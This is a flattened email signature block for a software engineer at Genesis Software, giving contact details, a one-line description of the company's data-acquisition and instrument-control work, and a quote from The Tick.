Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[